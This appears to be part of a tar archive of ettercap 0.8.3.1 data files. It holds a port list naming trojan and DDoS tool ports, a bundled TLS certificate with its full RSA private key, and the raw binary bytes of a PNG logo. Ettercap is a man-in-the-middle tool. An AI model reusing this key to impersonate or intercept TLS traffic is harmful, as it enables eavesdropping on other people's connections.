hpnpd 22370/tcp # Hewlett-Packard Network Printer daemon hpnpd 22370/udp # Hewlett-Packard Network Printer daemon quake 26000/udp # Quake game server wnn6_DS 26208/tcp # Wnn6 (Dserver) hexen2 26900/udp # Hexen 2 game server halflife 27015/udp # Half-life game server subseven 27374/tcp # Subseven Windows trojan Trinoo_Bcast 27444/udp # Trinoo distributed attack tool Master quakeworld 27500/udp # Quake world Trinoo_Master 27665/tcp # Trinoo distributed attack tool Master server control port quake2 27910/udp # Quake 2 game server quake3 27960/udp # Quake 3 Arena Server heretic2 28910/udp # Heretic 2 game server Trinoo_Register 31335/udp # Trinoo distributed attack tool Bcast Daemon registration port BackOrifice 31337/udp # cDc Back Orifice remote admin tool Elite 31337/tcp # Sometimes interesting stuff can be found here sometimes-rpc3 32770/tcp # Sometimes an RPC port on my Solaris box sometimes-rpc4 32770/udp # Sometimes an RPC port on my Solaris box sometimes-rpc5 32771/tcp # Sometimes an RPC port on my Solaris box (rusersd) sometimes-rpc6 32771/udp # Sometimes an RPC port on my Solaris box (rusersd) sometimes-rpc7 32772/tcp # Sometimes an RPC port on my Solaris box (status) sometimes-rpc8 32772/udp # Sometimes an RPC port on my Solaris box (status) sometimes-rpc9 32773/tcp # Sometimes an RPC port on my Solaris box (rquotad) sometimes-rpc10 32773/udp # Sometimes an RPC port on my Solaris box (rquotad) sometimes-rpc11 32774/tcp # Sometimes an RPC port on my Solaris box (rusersd) sometimes-rpc12 32774/udp # Sometimes an RPC port on my Solaris box (rusersd) sometimes-rpc13 32775/tcp # Sometimes an RPC port on my Solaris box (status) sometimes-rpc14 32775/udp # Sometimes an RPC port on my Solaris box (status) sometimes-rpc15 32776/tcp # Sometimes an RPC port on my Solaris box (sprayd) sometimes-rpc16 32776/udp # Sometimes an RPC port on my Solaris box (sprayd) sometimes-rpc17 32777/tcp # Sometimes an RPC port on my Solaris box (walld) sometimes-rpc18 32777/udp # Sometimes an RPC port on my Solaris box (walld) sometimes-rpc19 32778/tcp # Sometimes an RPC port on my Solaris box (rstatd) sometimes-rpc20 32778/udp # Sometimes an RPC port on my Solaris box (rstatd) sometimes-rpc21 32779/tcp # Sometimes an RPC port on my Solaris box sometimes-rpc22 32779/udp # Sometimes an RPC port on my Solaris box sometimes-rpc23 32780/tcp # Sometimes an RPC port on my Solaris box sometimes-rpc24 32780/udp # Sometimes an RPC port on my Solaris box sometimes-rpc25 32786/tcp # Sometimes an RPC port (mountd) sometimes-rpc26 32786/udp # Sometimes an RPC port sometimes-rpc27 32787/tcp # Sometimes an RPC port dmispd (DMI Service Provider) sometimes-rpc28 32787/udp # Sometimes an RPC port sygatefw 39213/udp # Sygate Firewall management port version 3.0 build 521 and above reachout 43188/tcp tinyfw 44334/tcp # tiny personal firewall admin port coldfusion-auth 44442/tcp # ColdFusion Advanced Security/Siteminder Authentication Port (by Allaire/Netegrity) coldfusion-auth 44443/tcp # ColdFusion Advanced Security/Siteminder Authentication Port (by Allaire/Netegrity) ciscopop 45000/udp # Cisco Postoffice Protocol for Cisco Secure IDS dbbrowse 47557/tcp # Databeam Corporation dbbrowse 47557/udp # Databeam Corporation compaqdiag 49400/tcp # Compaq Web-based management bo2k 54320/tcp # Back Orifice 2K Default Port bo2k 54321/udp # Back Orifice 2K Default Port netprowler-manager 61439/tcp netprowler-manager2 61440/tcp netprowler-sensor 61441/tcp pcanywhere 65301/tcp ettercap-0.8.3.1/share/etter.ssl.crt000664 000000 000000 00000005321 13711276346 017222 0ustar00rootroot000000 000000 -----BEGIN CERTIFICATE----- MIIC/DCCAeQCAQAwDQYJKoZIhvcNAQELBQAwRDELMAkGA1UEBhMCSVQxDzANBgNV BAgMBkdpdGh1YjERMA8GA1UEBwwIZXR0ZXJjYXAxETAPBgNVBAoMCEV0dGVyY2Fw MB4XDTE5MTExODE2NTAyOVoXDTI5MTExNTE2NTAyOVowRDELMAkGA1UEBhMCSVQx DzANBgNVBAgMBkdpdGh1YjERMA8GA1UEBwwIZXR0ZXJjYXAxETAPBgNVBAoMCEV0 dGVyY2FwMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1oJaLpyAOBKB iaIIu7E0CWIO6DOaN7hZyjdRq3LcnOWKQqpBsEPSC5UPFuyCAClMATGiqCMOzpoI xMcE6UCAigP5k4MkQF++M4vHppasC1IYcdYfq6TvpNN16XEErIc3qTwrNd5JHtpV BMctOjKL1dNiyd0laWfNeR0HlmQ+XDX5EsovcAwWEaIXq7ZQzTcaICXsIIgEyJq/ pcuvdO6L9xmVxMhK9xCjEDtnZmpzk3j4oaeyMTgxqK1v2sennzS2tHn8u1pSm/k+ Q6Uftl9vEs9xxtGzEdBYXFjt7CGDLWU8SFmAVnHtoeyBusJYoj7EhP4QZRPKkGlQ z//l1D9p0wIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQC6FQ5D0VC5auhl2OcrXpAy KGpbdBI/YngVqMOsaB0Nmm6DAGZPtvxLysBPhXpc9BS/SfS7p0ZwUdJT36D1NtlN Vapa13Z1X+H/15hCS6SleUz7IvBEU5paIqv2NUoFDsNQ3YVaAcf94NSirV085Yv/ Ii78d3J6o5CjbwSCoHYxWEEinHXLMXTQg4BOSGLpR4hK66mr+GU9vGpB/yq8LPDU YGghTD6L6Wml/p1R0u15mV5Z5iae5f6VwzoEH6674Cl7UHbeEg9qEt1U2ye24x9T SFSbnxNK+W6xTlrGXDnuTJwKm94yZTuAzIOzQdcNYtuhrLQr4D09q45rsFBBcQsk -----END CERTIFICATE----- -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEA1oJaLpyAOBKBiaIIu7E0CWIO6DOaN7hZyjdRq3LcnOWKQqpB sEPSC5UPFuyCAClMATGiqCMOzpoIxMcE6UCAigP5k4MkQF++M4vHppasC1IYcdYf q6TvpNN16XEErIc3qTwrNd5JHtpVBMctOjKL1dNiyd0laWfNeR0HlmQ+XDX5Esov cAwWEaIXq7ZQzTcaICXsIIgEyJq/pcuvdO6L9xmVxMhK9xCjEDtnZmpzk3j4oaey MTgxqK1v2sennzS2tHn8u1pSm/k+Q6Uftl9vEs9xxtGzEdBYXFjt7CGDLWU8SFmA VnHtoeyBusJYoj7EhP4QZRPKkGlQz//l1D9p0wIDAQABAoIBAGP5PK6coeWAOn86 1Xckj2wQF4KBCk8NzEtCnP2a+tbk5BtN3m+YLDzZq76zW6NXm+SyjWxvamc/wvZz Cwbq2P15/MeTR0H5XVwIuXQapPRhvqLPeNM2e7oGE95InjUKkBZ/xGPGxa1rdFRV v+5vwFxXuKL8PoNxrYHU1cRx096FLrAS++/iI6Q24QOTdbutd+U7eQRD1gCG0Qku ubNFNwhl1cQatmKBvFoOjuzAtL8X+zkCeaPDSL9IW9KAVmNa3D+M4qFdyBJvvSMi bnYPAEmRjCZ028WRcSCmZjUJgWRaaXsNB5v0XwOjSWWJwO0EfuUuwl2sHliZqe4U V5wZmoECgYEA6/2SucAQyNY5jIGGwFkEGBxkLzQuqtvYAa3qkzHPDLwjLsQix0DW LfkhLmG558wrhknBNFeQRXSV6+OTtvbYld/AmX8wKj7apGElPXEY8DMMNGBhUxY7 y5rmmINdEVv7T3G0Jpu5q1Gb5oZEZAQ2leUt2tm+pPE/NeaekKgaKC8CgYEA6LKA +xgx2fxK3QNklyqM9cnuRj7ZEGaNOPCBeMaNPWgMAhMmB7DuKcKpO9+uQPOVX209 51X+co1CmmdYErBC66OzVbSVoMkBgS+ckXhjrTOPkBLinGALtcXxZ40cftgFGVB9 Xa1X4dPZai8Z/uLqLXhoN5XweFKoz1j3nOnBS50CgYAE3HZXSTOPT4pj8I8cCzlg XcVai5KihmDOuAxq982yD3YSEow82oMO82DRmcXAlp4W6BIIx/z60Un9T/TNAgy4 GaHYB5ywYhcS58VinJ/M4uBPe+TFV2Hn8crqPVp/bwugOVFisjaC5u11NDLYdJXD RLNLHM0mjKmmrJd7l1rilQKBgD5RJ6eXCCq3nRjpQrQVCiD8zhnz1M/GlwVrq1C7 47FRPv4DQMkIgg+e+RF2ysTMNvGSYOSmK/ljiTWufXCr0ZAni+xk6zle+08sgAKZ OiB1UXolBJkaQ6iPdSHlMX9qvJrV6mz+8i0hPfVo3c5b2JkKyOYx+m9Ou7Sjv9Q+ 6awlAoGAcoTrU4IUdkvwbRJLkmdTPXLW310ff3xUiqIKm6f52zuoVsTZXYSe3ULz 6uCc2mWAHQpUaWP409PbAomOmuEoC3kJwSTQp7tkH57pH4KAiCUO8C6wT/mdJ8+9 PoroJQ1Gi+lRCITVdf53W+8yaxeWmFvaRVWWl5/j1HhR5L/N9w0= -----END RSA PRIVATE KEY----- ettercap-0.8.3.1/share/ettercap-small.png000664 000000 000000 00000041315 13711276346 020213 0ustar00rootroot000000 000000 ‰PNG  IHDRÈ Iÿ#©bKGDÿÿÿ ½§“ pHYs  šœtIMEÞd{o IDATxÚìy|”Õõÿ?÷Yg_2I&ûJ a »ì‚ˆ,Š"ˆûRp­Z÷­í¯µõ[µÖjµ¶U«V«(uÙ÷@HÈBBȾL&™döyÖûûc‚µ­Z@ªóy½òŠ†ÉÌÍyÎû9çÜ{î}€„J(¡„J(¡„:¹²Ûm #$”З©´tă„ 0a‰ž˜„ þ»Üiî›ÝîÔ«–H’Ðç‰B§”ª C$IèsÄq,Gå–H’Ð爖%`€$IèóIJ  H„>/€0,a((›0E„>/ÃbB>aŠ } Ë1,Ë%"H„>7‚ C$HBŸ (I’$¡/Œ „Ä,V„>×F @€$ôE$FØDŠ•$¡Ï„‚e˜ÅJ’ÐçÙˆ‰+HB_B(6Ñ‹•$¡Ïåƒ0$>••P„>/Å"à8.A€$ôE6"ÐEz„þ],Ï€€aÓ¼ @ú‰<Ï0„€çøDI’пKÓ4†aè”&l•$¡Çs Ã0ñÅ„€$ô¯ây>ÞîÎ%ÖA€$ôŸ€pÃË‘„5€$ôobYŽ€ ‰^¬ ý§X†‰·+’Dù!Ö  üq“ãù¾„PJ¿ì%)«¹ÈéJ*4™ é„óvõìéíõ}$H19qq€œ !–ÄS,Pr\ÞÈ4YLî´t÷ ‹Í’/ˆB/ð™ C²¨®;@¨6BÀSJA© ”ê°¥¤#;–|¤|WÝ4wzJ—§Ó›¸@ @¾c–¥ýÚL&c†;=-ÃérdÚì¶^àÒYžË%):Õì,C °€P”B§(Õ?u~ªÐ4„èT ê@bCPéLjLò ÑㇷÖTÔ Îo¨¯kL\£yù&ør9“ãÆ·WQc~—;í= 5GÕhì K, ÃX!"T%tÀ±ãß)è?A€ è,TDAu ”j Pa1¦BòSõfp †² :ªˆ4}}>h J@(AR’3¶{ûL›Íâ B‰ •ääÊåJBNn^Úð‘E/¿øš”œD.¸â<„BÁ;¾ª«gžÄÀ@THv¥£³« ¯B‡ Bt€èH³GsK#X“ ]!ÐM¥ˆE¨ŠMU¡©š¦AWèСS B†@RTˆ¢Èûêjš3IöXŸÏÿ]›ÌlàMI1%Ò:tø`TªKò}ׂ…s~R0(ÿ‰Ô”dìÞ]†!%yðúº ±1X v(1~¹ <ÏÅ«Äïü‚`A¬…DûÁ€‡¬èPdªªC–dP]ƒ¢jÐ5 ”ªÐ0”¤VÕJã`©*ƒhT!+ÇkJ.*+{`±˜¡)@ ØÜØ™—‘™æëhï:¡ö`Yš¦}öGé_~îy—õ ŽgÇšL&Þd°zöì,¿jͪõërr3ÑÒÜž¨A¾¯>|X†·§ÄÍâŒÙ3Ð×Û”Anèؾ}¦NŸŠÃuTg *TMƒ¤(È24M¥€¦KÐuš®ÇS.BA‰–§`9€Rfà6¥á†%tH}*lÆ0ŠKüR†{‡pDo/…q¥;6„Ñ$À•ì´Z¬–öúš¶wZr§§«çD™ÃäJvWô»_¼b±™tzZ,Ë@Vd€ÏC4š e Y•H$A8B /ìëëßF·†ò¶ª²Æ#ýýþÎüAÙ¹f ù½ÝiœGui©™èhó®þ©7Îzô™;qçu&ù>é÷¿{ %ìïË.;ï½ýF”…ÑhÆÁåÐu ,Õš„þ@áHÍ ‡1®Ý-PB`4â&Ö(t€R&α¢›R€†˜/ =m&DB:$% JU0 ‘çÁñ<@)dE†,+ñ|G°bÊ; &ŽÆÓ÷®Ù.@‘40,UÑ'57¶ïú²ÅÈ«–]xÑiS'¼òÔŸŸ`ßZ¹/®xÉI.°õë÷ùÁò TYA~a:ÚÛ»À3 &D‘ƒªi% ²¬‚ê/B0òÍ*K ,œ¼g\;OÜ´¢……h4Ðp B†uôHë'<ÏAQâWdM§¸è’ùÜvçÝ?ÏÍ.¢¿zè"I1¸Ý©4 Ї`0ì•esÐ{cÓ‡eèýF“K¦ÜâJ³þ!9)¢`Që›oZùÒÚW„€at&ù_Õ]÷Þúré˜Q—Þ±C§Ï@O—U5‡0lØP8pÏ„Íj§·’,£££6[vo=€¡#KâÅ9¥Ðu Ð5P]‡¦Å%Y†"ÉT£°X,PtR,ERÂB 09ˆ& ‚- FTâGÙ©…–rˆ¶2¸ìWgà·ltX-VÄb@™së7®Ï"ŽáÒËæÿcÉÅ-Ý»o7mji$FшŸ/Àqháyãê=[ª_=ÚÐTyc:»ÚŒäÔd$'»PUs`¼ÁJØõBI4`ÀéãQlj¯ëñT,ÞÆ®éñ¾®Ž½O|ÑÆ{(Á4ðÞjˆÅˆQiðtI8R€Á €x(Z¬¨>s¤¢÷úÌÜd´7픆OMM±ÎrÚ–4UUGMÆQ§c¼ÍfÊ7› v“ÉŒ¤¤ädçQwj&1 Ð45µ±ogmêO<éwº žÎ^H?ç¢É¿ÎÌN[RP0ÈáëH u­wØSÿò‘úº¾Ï~¸Á("•€|=ðÈ}XóÎGC-=«Öì…Él¦ ¢ê TU£º®UÓªƒ0 X–ƒÈ‹`9,‚BUTÄ¢QD¢0,‹q£'ãñGÿˆoºŠ× KVýýcX¼äv¹(ŸuøÔô$twú Éfý¥¤¤h&Ï‹‚ÈÀ0 ä˜î9\}ôסPøÕ5 ËòIË9DÑàܶyï GŽ6$ù/º|Ùù‹GäÏlïjA{[ìÖ¤-¾žÐ¶–FÏ~¯Ç×-E•¨®ëªªêª®é:ÃVyƒhÄÔ´ä”äG~’Ë1Ä`ä‹4ªªªj•$IHNN2ïܽ•Þ{ÛÃÄœ‚Šýû‘]X€wß]…é3¦ ¶¦míHKq#¦Æàõõ#ܧbì,`ÿ'½«¡¸ƒz·§ñ–mˆc-ñú?k =ÞÌ} ÒèŸI±þ >M¯>­]( "ÇBéçàHz¼ñÍõš¦Áb¶Íi¨oÞðïö›8eÔ䉓F¿ž_X)ÉUe´µ7£ÛÓƒÉS&!+#®¤Tˆ¢B T]…,+ˆDú¯·ÏÛëõµ†ÂžÞž^_ ê!DÏ4$o¥íÞݾÞÞ§Ë9ÜdrǙֶzõªŠêŠ–¥ååeáO’!ÇRLnÌiƒo.(É8×æ°;{~~¡Á( kªJYRBmÍ»~÷Ï,IòE¹Ã€çø”{ïÿqW·¯(Z”xÚO¾ÿÆæ[¾AúŸç/IN_–en½éNDºº‘<¨‹¿yðA\tÉ…X·öC˜Íf \€½eày}Ñ2d¥¨ïjøg$€]G]Ó¡#îØÐuÄƱ(ÿ®+:Žý7¨Ah¼Ñt ¨šhê1çb>Ý©ét€ã8ØìvdggAÄäí[wõÊr|ëîè±%CG+Y5~ü¸Â`(DûúzIÀa€‚‚!8R_‹)“§CUøú|…D× 3€Èó0˜ °ZlpØœHr%ÃfµÃ ¡i•ä ‡#‡ƒGBHINÁž=»è9ó.o¸öÆ¢]»ö¶~…Kä`€¡?‘b} ýèÚ¥[RÓ]Ó|}ÝèhëyyÍÛ›¯øö`9†g“ÝI¬Õnb‘©(¯ P 5ËôúÕËoZàüTÿ4EÓ)…®Ä¿SñUy]ð`Y †aàt8QPXˆ’¡%(\wj* MÓ°úýu?}î¯/=€>²pâ¨1%/Ÿ0¶(“h—·“(ŠŒP0€ÒQãÀÞ^/­®>DIVBAXÄ#€•Púie‡R£€z¬SYX€¡,¥”! Ÿ«èëõ#';¹YtÜè©äчž±jÕêC‰u ‹.]ô¹é?íïï#ª¦P“Å‚þÞRZ:8ÚÒ³EÔívGÛÍíKvîؽ÷Û\£ß>{[¿I°Ú«únxìw|zÜi£°o×ArÝíKv L¤CcA ÇNÃMWßë–”˜7Èqÿ—žýáùçŸ;[Q²uë'ШE‘u:@t6C°ˆŸpEÀ0ñÐO@ºj`X,À̧‹s Ì>c>r2 iÝ‘Jò௽å@YÍ“÷üüŽÍã'Œ›¾õ­·1ç’Kàíò ¦®‚È£¥¹O‚¡Ã#l‚¤˜ „Å KTEÃÌ  A0Àår!/¿…ÈËφÅ`ee„üh|œj3ªì¡b0}y}ÝÔw¸ž(-VbÏÉ‚»¤„:s²ÕC>#Ç$ Ÿ¬†Ù& A§ ’’]>?h·ÚrSÝi¨¨®¤ ££ÅT¿âÏÏ‘¤X“ÙbB8ôíêßßyÉó…C²—M?K]>¨©±õÓ§çŸ~Cþð¤?E8 ÐÒaý?¹þ¾t± ßbì—/;ÃYóæÌ:|¸Š´w´SQIkKç;«ßÚtå@Í ¬ŠXÜn·ËždI³;,i‚È%[m–t«Õ˜Á \š r):¡†P«¢(¼N5t Òåâ;<¤˜Lòr 1iüt¼ýÆ›eeeõ“ï¾÷6)?;‡­?B†ŸüäV Q “ÑOG› ÑßÛ`0–a "RRSPP4%C‹‘îNÇŠŸzîyaÏ4‚ñ8a\²ÚÚˆ/ä ±–‚­]`‹ÔÜ|dŒgzbšFuY&ª¬PB(åŽ@€465âhÓ(zÎ3^GFFNÿöªîMrq7›0axW—‡vzÛHRŠ…¶7/ùð½+M#"¡ãÓö!ð†!>}SíÔ±sè=íyíïo§›Íf„ÃaÐøž{÷ ÷,9ÈqŒ;ŒÑ £¦ùoX~W6€Po0iuýÍWì;aä¸Ãµ5Äì‡Éd o¯ÜxNkSçš/š‰úº¶a6#;73Ó•jK+)MO×”ã2{ú´·7K/=ÿö¢û~~ÏZ_}&/8f£¿~ð¬~÷(² ›ÝŠ£FbĨáHIM…Ñ("‹! á9ý ¬³j ï óÌ:DºÁKFÀÛžêfú¤e!gÔ(8²³ÀyDÃA„ûÃPbQp"ƒÑ€ÂãéFÕ¡C´º¶š„b½Ôd4‘ÌÌt8]6Êb°°4%9µkÝëe—ËJxè¼ÓŸ4[môp]5(§»ÃQýÂã«Ç.¼`vlÕ÷‹öà_n d²6î 㸻ìØ¿Ùìü!\vÍ‚7œ©Æ%áDgO[ ,¿üŽÂh4Ü6¨¨Gê€|q·ßsíAC †U×TY‰QE‘É[+>¹>Ð~æD|à?[†ßÿææüKÎ|Ù`¦«%P)ŠŠ†Qã Kœò”)ŽOÞxWÞzã÷ÞDŸ×‡œ¢Á€OÕâŵþ´ÃÐʆ!–Q®<¶6pý}D R‡"yøp˜\.D"aô÷z¡*2xŽ… Àób²‚~¯‡ëëQU{^o¤˜†!CsPXX€ÔÔT(ºLcRˆ^£—ÕôÁs¾{¡Õi,šsÖ¸íùƒ‹L^oÚ;:¨Ù%’°O½õëÛ~Å Y=!îî__½>3Ç}æ ÷ÚØÔöêM7ÜrÙç½nÚ¬±ç–NÉ{7ˆbáÜ ±eCÙí?öäã‰ò2DÄbDA0ÜñÓkÛ²ò²’(#¢È ¾¾ uG½ÝÁÔ?r26àð\>ç#†§ÓTEƒÉh&Åü3/@FjÖþõy š3ëÖ}YVP[B©¿ѶøZÛ‘T¤ {X1,©n¨,A4A4€&)àx£†e¡È*z{zÑÚÑ_Ÿ‚Q„ËiØ­Dc2† "ûa#,-6By‰Ú0šqÓ{+7ÝÚØÐR‘šê?mæÈwó ò2t¢Ó–¶V•ÂHͲ£|KÛð{««NÂ¥,¼é§URJ“íÙÁE /uàsZG&^Š›Ê×ßu^ …––‘VˆÅs/\°ôÒ…‘HlcscµÙ¬‚ @Ž);7#où INMfØŽe°¿¬ŠšíÝ´¦ÒŠðÉÏ°QƒÎ,X´>• * ¨NqÉâk7xnYz1¨¯“ ‚+ ÅCà\Ñd@,oÑd,!`<à ¿?€ÎÎNtww£ß߇¤”$8“l(,)„Õf†É(@'šª#ðÃê°C•U0‚€p8‚²›0lÐÈ}o¿ñÑ>oÿ âœó ³.6ÉLwz:c4I ØGÛ:;‰ÁÂBdMeÿx~ãÒqJKÿ«~ñØõUi)CS™xãåuYï¾û^û±ÅÊϾ_~æ[Éi¶ó¥ˆ†Ó§Ì§Š¬Ð k¶]¹bÅk¯ü #Èãÿ·Ýö30^|Å9«gÍ>}¦ÇÛ‰æ–&Òëé§Q= £™ |{ó¬£u­›8ž…ªh'elY©èhëƈÒÁæ1§ é †‚b__™1ùlÌœ> ›6oÄæí[‘•‘AàÖ1"Žå Qý½>466¡¹¥Š*Ál±#77i™n˜¬&˜-&¢Á`„`Á±€F ÌF±HýË@“eØ].Ä$å»·"ÉÀëW.å8Ž ü$Ãá°C':z½½ˆiš’n#µ:îÝZûþɼ¦CG Fuežz鑳k=·=øÀ£ø¢×Ÿ±`>^³ç\8ãö¼!É¿ïhO;ƒäf¥†] æ.šäLr¢Ï×÷ÃäØ>åùgÏY4tTîË<φ Éîص‘H¬÷HU“4â´Aé½>/6­©ÕÝá«ü.ÇëJvr“O¹Q0’©åøÍÏÿHÊìÁå(4š¢ù›››¶Ãþ¹í-¬×Ó‡XXCR*´Ì  F’ÛW’u¨¬ùŽO¿ü™æÀ/NoÄŽó! K.]pݬ¹§=í2g.<ùç¦YŸfyéhmêDz–Û6ûœ1Ÿ$§ÙÇÈ!•Š‚™Lž0+¸äÜ+G^{Ýò¦gŸyþûÈ’®9ŠK–»9Õíœ.òdd§ã`ùøzCï´7v¯_tÉY©­¯ ëÞÚ[ÚÝé;eN$›8eÄOÓs¿9TUEý}° k TP†•MfѨ2&‘êr¢dhÜ®4ˆInDÑX„hºŠŒ´4„ÂaȪ†Ô$Ȳ ]Q ,¬6+|¾ "¡†@4›Hèh­…Û•Œžf/‚’„†¬IÔæ05Ænhªó,©.o üûØ/¸hÞX¹’¦ÏœxuRªmaZjº¿§·Û^SÑxwÕ¡Ã;Ž·½yú®†ì´‚‚úê®3~ñÓ_müª¿wÚ´‘C&Ì,ù„æJ!C Ý-±{~è‘G¾÷€dd¹'ü¿îØš’œ*txZP^~‘HL«©hZâ´;kæœ=¥¶©õÖ¼¹}R{K÷®SeܣǗàÀÞç 1®°Òëñ  ‚e9šš’A&ŽÞÄbߞػ·3&@V‘þ‚QÉ™ÙÈ‘TU…ÝnG{wRVD Y9$ ÕÀA!:dƒd*Ábu ?Dg} ÌF#:vÁ¯DàÎpAc]ËQï•å{wÁð§Ïžø+«•¹ŒRÝVX4˜=f"ö•í‚Û†h4Š¶–Ž}îÉøLûÈ·•Õlü«'|8Û5¬ù‚ó®ÈûJÓ—<uà„–ñS‡ž0}èG:U“DÎŒ¹3×̵hè¸qc°oßþãvm¿óÇŠ7ÜxûÞ»îÇW=êíéböìßAzº{Ԛʖku-IOËìž0½¸%‹býû»æ6Ö·m>•ÀîêˆïÌóõø»‰Æ=ìJuM´;…'‚JbRnw.»ðZLD"HI¶#‰A’"0[­e œÁ)…¬éP¢¸\.ð Ë D³ÁP±p:Ë‚çtȪÎÀ" B ø ˜X¡`˜ª*S·ú²´Ã•M/wµ÷þˆ( £&L*~hèÐÌKGúErª}"Ãè³”áM,šš`ÈàDÂhšN 3çÌŸñS³Ù¬ÖV×oµÙ¬¤o÷Y‘{ÇM6,-3yréðñžoÚ—œ’ô¥ûÑõøf˜Ì47tvíÝZý;wfä8/9X½7õö;o¹¯¯7ÚYYQyà>‚›51ºä¬›nYöŽÉb0î)Û…P ¬¯j¿¨º¼y½¯¿[3v‚팣úEƒ@ÞzuݼšC ëN(lv+þ †”M-žò~zZºF…~Oð¥ÞßzËÐ#ŠGæ…aQ0ÀnuÂl3A ·#Í„HH†·ßŽ`w¥ÂêpCŽ†A,(<Ý€®Âœä„Í.Àdq@VUDú=°¹]õKB=ˆx} Ö$U;ÊaNJ(ð4“Ã@¨"Щe1MÜhQä³EQ4Ѐ72M<å†ð0:t…@` `žº’Ü„'|¥T'ßâñK¯œ¿lîy“ŸomèÆÂáô¢E×&ákîó˜{îT¬{oFŒìÈœödnaÊå3§Î×Ø?8{Þ’sh©©)èîöþOÂ]²lá«sæœq¾¯¿‡Ý_¾ß¤¦mÉ®Í7"Þ;…n¾beZzê"_À#8]N¼ùÊÚE‡y÷TcÖüi7—f?|÷M÷›ÒݨiÚ‹ƒËPUUhX†§»› ‰…¢½{¶×þ¨`PÎDzÝ"¹±Þ.-‘JX–@Q€¼‚LP – j*,&3B1@&V»_ø}0Ú,‹ÅXdàypœŽŒL3Lf+x¿/ESaÌ°Ûìˆ)躌ºšý1p,_çÅ;^9íÌ>$‹£PUÖŽ矉ææFÚt´˜Pâîa(ÀQð"–ˆèi¬ˆ…”ß´zÏAºÝi¿ï‹ûçž7ëÞÝüüó ‘é?Ê/vÿ‘eY¤§d*,uÚ“ Ï žgÿ´bÙýך-f„C_}Í6'?-¸û¡+?)”uºÃš¢>ñÐKîÜ|à— xH±o670sî¸9Å£r>LOÍ@[k222Eú>|goIEe¹ç;dìøR”í-ÇìyÓnËÊJ/åR˜–:1;3“+¯< Wl¸nÓ‡û^ú̬ˆ1/?kÚåËÿtÐàüÕ‡+QWÕ¸§ápÛ¢Šuß5g-˜}uF‘õ77.¿35=+…¾óáËäPUT™€xÈA4­k»ñ“µ;×/¾ü¬B¿¿ï²ìA©÷È’&ø{CTS)1 &ðB<íDž0,ÐÙØ€‘¥y0šDð¼°*t@ã K:j«ë‘ž—…X0  èïè;ËÆ¡Aa[á°eàµÇwãŠ_I—èê—?¹L° ¬Á(&±,ÇèЂ,Çu[,¦¦ÞŽH÷Þ퇼ÇÒ×ÏžÙûuGg.¿4«0ùOf³ÑæNÉ.äf ±±áÈ Ï¼±¼µ¹}Ë×±oñðÔ:Š+o:û‰Ó‡ÿ|ÚisÐÓV®|eÇ3½y€ú¯¿»ìðõúãã={Âm%cò†N )”Ê’¢òZòíþã_Ÿ:©€[ä›8iÜ‚+¯¹à5N Ö;w`ìøѨ?r‡ÊëïÛþaí1%½lùâ¹CJò~ÅrlvJrJ /r\Kköï­ØÑÖÜuã¾5åk7=‹ù§_{R äÓ#«â“0gϹpÒýInañ—,³O;¾¶êi²¿l?¥”!¢h@{CÏÓRHÿýšw>:Î$ú|Ÿ¦ÏÜÌã¯Iäüs8AØ/è,8†¥€¢Æàõt!'Í Ñ(BU’œf žYÓ KB}|²­ S¦D°'ˆÒ±“PÓ¾¢1 D×aµZÑ^%!¬ê<²€þùwGúûƒŸ»e•ehšþ­íätÙÐ×n΢‰³Ý™öIvwŠ3“rÄ@L3Žih®«n~ðõŸ< î´xº¾<ÿ?ÉÆL*Î(.ͽ{êô 7Κ:óõöcré|;€À·J_Î6ÿÂɦg;k¶ ÎP(‹ÁÊÏ->è‘V½öÒûkU,ÇÀÖê¸Oã ›âvN¹ï—·ü\42gzz:h? úÃ}GÚØ»½ö…p0âw§'ÃÓÙƒ+¯YšhéMòöz›=]]ì®? Àw2£CaQê›0|xñä¼Á™‹¯N6ÚÄ‚Q£G¥;çBdgeÑ÷?y ;vm&"‚=±}=Áß½ÿðö*”Žž–’cùƒ-E¼0‰ ¥FÎHœ;8FÀº5786« ý>”ŽÏƒ Šàye{£/¬!;7™©™°@%%J%Š­ÛS+¬!4»$Þ²2 ž“a·Ïâ6oñi3“R¬ÏºÜ®Ang:e‰H¤˜(ÔÙÙµyóú=wtx¶ed¦£ã¿Ô)Ÿ4<™…×—Uèt+.~¸zëÑo휟¹Aœ¾`Ü «U\b¶ε¹Œ FŽ1­0‹j3¹zLK{KïK÷ÿì¡ß|@ø””äãO+‘‘“ä I/ðÐ5•šàÈr@—Lš0 Gß}kÝ宬Œm§ÉÍ—[+ìSÿpß»âIŸ®yÈRÿìŠ&†Ó‡N›WjÙ´ªââò=uo|Wvüì ‰ó–Lìpžw§¥;IÔnM!{víÅ.¿¡õÌ™g眊~ðïÍ®ÇN¥ÿZ€Œ7 öU€ñ³‰¤;‚Šÿ1 ì1±Þ÷ÐÕ¾p ªŠN‘GŸ?Ðì“ööŠVÐÿïÙ»ñókO›Ï…Ëg·çäfdÜ~ã/±nýû´¹»ž¸Òœ¨(ßO½í½D×Yôù}›NwgX&†I¥”FX†=ÜpÔj¬2jbîKöÃ0”¦$§};ªjXÆøÀ¾­5¯ ve9šw´³—N]˜žëX)…tã´©³•ž‹·V®žýܳ/}ü¿â'?èÓÝ|çů8“í—úºû¡ê1Ê BøϼnÉ9ÿÕ~éu³{¯½öÖfLÅÚµïc݆Îu¤ C åÏöz»2Û½/m~ÿÐã /™(­zu÷¼ÁùK'ãí×w`ì”Á×»3œ¿ôy"/(²ÒZ¶«öéSÕÆÃK‡Ìœ:gèF]%T×€³ÏZ,Ÿ7ÿR‹ÅbVC¡pSQ©i.ô÷†³þè5-Íh)Ç3äÀ¶æỶ—ugÌŸtÛ´9#»áª»ðþš÷°ù£¿|ùooýúËrúÿ–ó‹"ï$¥ÿT·÷µw,ÙBiGŒ`ÀB ®xæO{ùÁW˜" Ý]½¸ýþ+^íñô€•òHë‘ÞÅ' Èȵþøâó—£¦î š›ðú«ë/ˆü¼îËàø÷ÿ_€ƒçy<ûû7§s<P´4]Ãa¹T0Ę‘™žäTÓE?:¦Žš-¹©±¨È$ÔOÿoõ[›ß>‘5`JzRžÅjÂÁƒh9Úu£$Ãÿ †ïƒEAAQ6ž}hý`†§º…VT•aÎ9Snëø†­)'µ¦ú!ÁÁñ*Êjñã»/ÝÓÑÖnÔ¨Jt…|òâŸV]Åóü§íÔÇ[³çO¼ÿªeËfzzÛéѺVýñGž[b2µ¯³’ý¿¬>_jØåttÚSÌ 